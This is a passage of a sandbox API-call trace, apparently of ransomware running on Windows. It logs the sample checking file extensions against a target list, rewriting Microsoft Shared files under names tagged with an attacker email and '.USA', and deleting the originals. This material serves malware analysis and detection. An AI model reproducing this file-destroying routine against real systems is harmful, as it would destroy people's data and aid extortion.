Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.970] lstrlenW (lpString=".1cd") returned 4 [0054.970] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0054.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.970] lstrlenW (lpString=".jpg") returned 4 [0054.970] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0054.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.970] lstrlenW (lpString=".doc") returned 4 [0054.970] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0054.970] lstrlenW (lpString=".docx") returned 5 [0054.970] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0054.970] lstrlenW (lpString=".pdf") returned 4 [0054.970] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0054.970] lstrlenW (lpString=".xls") returned 4 [0054.970] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0054.970] lstrlenW (lpString=".xlsx") returned 5 [0054.970] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0054.970] lstrlenW (lpString=".ppt") returned 4 [0054.970] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0054.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.970] lstrlenW (lpString=".zip") returned 4 [0054.970] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0054.970] lstrlenW (lpString=".rar") returned 4 [0054.970] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0054.970] lstrlenW (lpString=".bz2") returned 4 [0054.970] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0054.971] lstrlenW (lpString=".7z") returned 3 [0054.971] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0054.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.971] lstrlenW (lpString=".dbf") returned 4 [0054.971] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0054.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.971] lstrlenW (lpString=".1cd") returned 4 [0054.971] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0054.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.971] lstrlenW (lpString=".jpg") returned 4 [0054.971] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0054.971] lstrcmpiW (lpString1=".FLT", lpString2=".USA") returned -1 [0054.971] lstrlenW (lpString="GIFIMP32.FLT") returned 12 [0054.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0055.718] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=320384) returned 1 [0055.718] CloseHandle (hObject=0x224) returned 1 [0055.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 0x20 [0055.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0055.718] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.719] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.719] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0055.719] GetLastError () returned 0x0 [0055.719] ReadFile (in: hFile=0x224, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x4e380, lpOverlapped=0x0) returned 1 [0055.726] WriteFile (in: hFile=0x248, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x4e390, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x4e390, lpOverlapped=0x0) returned 1 [0055.731] ReadFile (in: hFile=0x224, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.732] WriteFile (in: hFile=0x248, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.732] SetEndOfFile (hFile=0x248) returned 1 [0055.732] CloseHandle (hObject=0x248) returned 1 [0055.732] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.732] SetEndOfFile (hFile=0x224) returned 1 [0055.735] CloseHandle (hObject=0x224) returned 1 [0055.735] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0055.735] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 1 [0055.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.736] lstrlenW (lpString=".doc") returned 4 [0055.736] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0055.736] lstrlenW (lpString=".docx") returned 5 [0055.736] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0055.736] lstrlenW (lpString=".pdf") returned 4 [0055.736] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0055.736] lstrlenW (lpString=".xls") returned 4 [0055.736] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0055.736] lstrlenW (lpString=".xlsx") returned 5 [0055.736] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0055.736] lstrlenW (lpString=".ppt") returned 4 [0055.736] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0055.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.736] lstrlenW (lpString=".zip") returned 4 [0055.736] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0055.736] lstrlenW (lpString=".rar") returned 4 [0055.736] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0055.736] lstrlenW (lpString=".bz2") returned 4 [0055.736] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0055.736] lstrlenW (lpString=".7z") returned 3 [0055.736] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0055.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.736] lstrlenW (lpString=".dbf") returned 4 [0055.736] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0055.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.736] lstrlenW (lpString=".1cd") returned 4 [0055.736] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0055.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.736] lstrlenW (lpString=".jpg") returned 4 [0055.736] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0055.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.737] lstrlenW (lpString=".doc") returned 4 [0055.737] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0055.737] lstrlenW (lpString=".docx") returned 5 [0055.737] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0055.737] lstrlenW (lpString=".pdf") returned 4 [0055.737] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0055.737] lstrlenW (lpString=".xls") returned 4 [0055.737] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0055.737] lstrlenW (lpString=".xlsx") returned 5 [0055.737] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0055.737] lstrlenW (lpString=".ppt") returned 4 [0055.737] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0055.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.737] lstrlenW (lpString=".zip") returned 4 [0055.737] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0055.737] lstrlenW (lpString=".rar") returned 4 [0055.737] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0055.737] lstrlenW (lpString=".bz2") returned 4 [0055.737] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0055.737] lstrlenW (lpString=".7z") returned 3 [0055.737] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0055.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.737] lstrlenW (lpString=".dbf") returned 4 [0055.737] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0055.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.737] lstrlenW (lpString=".1cd") returned 4 [0055.737] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0055.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0055.737] lstrlenW (lpString=".jpg") returned 4 [0055.738] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0055.738] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0055.738] lstrlenW (lpString="msitss55.dll") returned 12 [0055.738] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0056.659] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=430080) returned 1 [0056.659] CloseHandle (hObject=0x1f0) returned 1 [0056.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll")) returned 0x20 [0056.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0056.659] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.659] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.959] GetLastError () returned 0x0 [0056.959] ReadFile (in: hFile=0x1f0, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x69000, lpOverlapped=0x0) returned 1 [0056.971] WriteFile (in: hFile=0x204, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x69010, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x69010, lpOverlapped=0x0) returned 1 [0056.978] ReadFile (in: hFile=0x1f0, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.978] WriteFile (in: hFile=0x204, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.978] SetEndOfFile (hFile=0x204) returned 1 [0056.978] CloseHandle (hObject=0x204) returned 1 [0056.978] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.978] SetEndOfFile (hFile=0x1f0) returned 1 [0056.982] CloseHandle (hObject=0x1f0) returned 1 [0056.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.982] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll")) returned 1 [0056.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.983] lstrlenW (lpString=".doc") returned 4 [0056.983] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0056.983] lstrlenW (lpString=".docx") returned 5 [0056.983] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0056.983] lstrlenW (lpString=".pdf") returned 4 [0056.983] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0056.983] lstrlenW (lpString=".xls") returned 4 [0056.983] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0056.983] lstrlenW (lpString=".xlsx") returned 5 [0056.983] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0056.983] lstrlenW (lpString=".ppt") returned 4 [0056.983] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0056.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.983] lstrlenW (lpString=".zip") returned 4 [0056.983] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0056.983] lstrlenW (lpString=".rar") returned 4 [0056.983] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0056.983] lstrlenW (lpString=".bz2") returned 4 [0056.983] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0056.983] lstrlenW (lpString=".7z") returned 3 [0056.983] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0056.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.983] lstrlenW (lpString=".dbf") returned 4 [0056.983] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0056.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.983] lstrlenW (lpString=".1cd") returned 4 [0056.983] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0056.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.983] lstrlenW (lpString=".jpg") returned 4 [0056.983] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0056.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.983] lstrlenW (lpString=".doc") returned 4 [0056.984] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0056.984] lstrlenW (lpString=".docx") returned 5 [0056.984] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0056.984] lstrlenW (lpString=".pdf") returned 4 [0056.984] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0056.984] lstrlenW (lpString=".xls") returned 4 [0056.984] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0056.984] lstrlenW (lpString=".xlsx") returned 5 [0056.984] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0056.984] lstrlenW (lpString=".ppt") returned 4 [0056.984] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0056.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.984] lstrlenW (lpString=".zip") returned 4 [0056.984] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0056.984] lstrlenW (lpString=".rar") returned 4 [0056.984] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0056.984] lstrlenW (lpString=".bz2") returned 4 [0056.984] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0056.984] lstrlenW (lpString=".7z") returned 3 [0056.984] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0056.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.984] lstrlenW (lpString=".dbf") returned 4 [0056.984] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0056.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.984] lstrlenW (lpString=".1cd") returned 4 [0056.984] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0056.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0056.984] lstrlenW (lpString=".jpg") returned 4 [0056.984] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0056.985] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0056.985] lstrlenW (lpString="TipBand.dll.mui") returned 15 [0056.985] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0057.307] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=3072) returned 1 [0057.307] CloseHandle (hObject=0x1f8) returned 1 [0057.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui")) returned 0x20 [0057.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.307] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.307] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.308] lstrlenW (lpString=".doc") returned 4 [0057.308] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0057.308] lstrlenW (lpString=".docx") returned 5 [0057.308] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0057.308] lstrlenW (lpString=".pdf") returned 4 [0057.308] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0057.308] lstrlenW (lpString=".xls") returned 4 [0057.308] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0057.308] lstrlenW (lpString=".xlsx") returned 5 [0057.308] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0057.308] lstrlenW (lpString=".ppt") returned 4 [0057.308] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0057.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.308] lstrlenW (lpString=".zip") returned 4 [0057.308] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0057.308] lstrlenW (lpString=".rar") returned 4 [0057.308] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0057.308] lstrlenW (lpString=".bz2") returned 4 [0057.308] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0057.308] lstrlenW (lpString=".7z") returned 3 [0057.308] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0057.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.308] lstrlenW (lpString=".dbf") returned 4 [0057.308] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0057.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.308] lstrlenW (lpString=".1cd") returned 4 [0057.308] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0057.308] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.308] lstrlenW (lpString=".jpg") returned 4 [0057.308] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0057.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.309] lstrlenW (lpString=".doc") returned 4 [0057.309] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0057.309] lstrlenW (lpString=".docx") returned 5 [0057.309] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0057.309] lstrlenW (lpString=".pdf") returned 4 [0057.309] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0057.309] lstrlenW (lpString=".xls") returned 4 [0057.309] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0057.309] lstrlenW (lpString=".xlsx") returned 5 [0057.309] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0057.309] lstrlenW (lpString=".ppt") returned 4 [0057.309] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0057.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.309] lstrlenW (lpString=".zip") returned 4 [0057.309] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0057.309] lstrlenW (lpString=".rar") returned 4 [0057.309] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0057.309] lstrlenW (lpString=".bz2") returned 4 [0057.309] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0057.309] lstrlenW (lpString=".7z") returned 3 [0057.309] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0057.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.309] lstrlenW (lpString=".dbf") returned 4 [0057.309] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0057.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.309] lstrlenW (lpString=".1cd") returned 4 [0057.309] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0057.309] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0057.309] lstrlenW (lpString=".jpg") returned 4 [0057.309] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0057.310] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0057.310] lstrlenW (lpString="ACEODBCI.DLL") returned 12 [0057.310] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.091] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=52656) returned 1 [0058.091] CloseHandle (hObject=0x22c) returned 1 [0058.092] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll")) returned 0x20 [0058.092] GetFileAttributesW 